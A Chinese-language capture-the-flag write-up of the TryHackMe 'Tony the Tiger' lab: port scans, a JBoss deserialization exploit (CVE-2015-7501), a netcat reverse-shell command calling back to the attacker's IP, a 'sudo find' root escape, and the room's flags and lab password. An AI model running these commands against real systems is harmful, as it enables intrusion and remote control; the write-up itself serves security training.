打靶记录(一零一)之THMTonyTheTiger

端口扫描

nmap --min-rate 10000 -p- 10.10.230.227
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-11 14:40 UTC
Nmap scan report for ip-10-10-230-227.eu-west-1.compute.internal (10.10.230.227)
Host is up (0.0056s latency).
Not shown: 65518 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1090/tcp open  ff-fms
1091/tcp open  ff-sm
1098/tcp open  rmiactivation
1099/tcp open  rmiregistry
3873/tcp open  fagordnc
4446/tcp open  n1-fwp
4712/tcp open  unknown
4713/tcp open  pulseaudio
5445/tcp open  smbdirect
5455/tcp open  apc-5455
5500/tcp open  hotline
5501/tcp open  fcp-addr-srvr2
8009/tcp open  ajp13
8080/tcp open  http-proxy
8083/tcp open  us-srv
MAC Address: 02:95:44:AE:CC:DF (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.68 seconds

nmap -sT -sV -sC -O -p22,80,8009,8080 10.10.230.227
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-11 14:48 UTC
Nmap scan report for ip-10-10-230-227.eu-west-1.compute.internal (10.10.230.227)
Host is up (0.00054s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6978cb974d0f39efef3a5eaf8a9b57a (DSA)
|   2048 33a47b9138585030892de457bb07bb2f (RSA)
|   256 21018b37f51e2bc557f1b042b732abea (ECDSA)
|_  256 f636073c3b3d7130c4cd2a1300b525ae (ED25519)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Tony's Blog
|_http-generator: Hugo 0.66.0
|_http-server-header: Apache/2.4.7 (Ubuntu)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|   Potentially risky methods: PUT DELETE TRACE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE TRACE
|_http-title: Welcome to JBoss AS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
MAC Address: 02:95:44:AE:CC:DF (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (99%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.8 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.38 seconds

Exploit

访问80端口

扫描目录得到 http://10.10.230.227/posts/frosted-flakes/ 有一张图片，下载下来strings发现字符串

THM{Tony_Sure_Loves_Frosted_Flakes}

访问8080的Jboss,访问 http://10.10.230.227:8080/jbossmq-httpil/HTTPServerLServlet

根据报错反馈能判断是6.X版本,根据房间提示是CVE-2015-7501

利用房间给的工具,用于构造反序列化链的ysoserial.jar和一个python的利用脚本，方便直接执行命令

python2 exploit.py 10.10.230.227:8080 'nc -e /bin/bash 10.11.77.28 1234'

记得使用jre才能运行

拿到了反弹shell

cd /home/jboss
cat .jboss.txt
THM{50c10ad46b5793704601ecdad865eb06}

提权

在note中找到jboss的密码

su jboss
Password: likeaboss

sudo find . -exec /bin/sh \; -quit

得到root.txt

QkM3N0FDMDcyRUUzMEUzNzYwODA2ODY0RTIzNEM3Q0Y==

base64解码后

BC77AC072EE30E3760806864E234C7CF

在线md5解密得到：zxcvbnm123456789

碎碎念

最近都没打靶机，在研究javasec，不得不说Java真的难啊。重回thm,挑了一个简单的java靶场。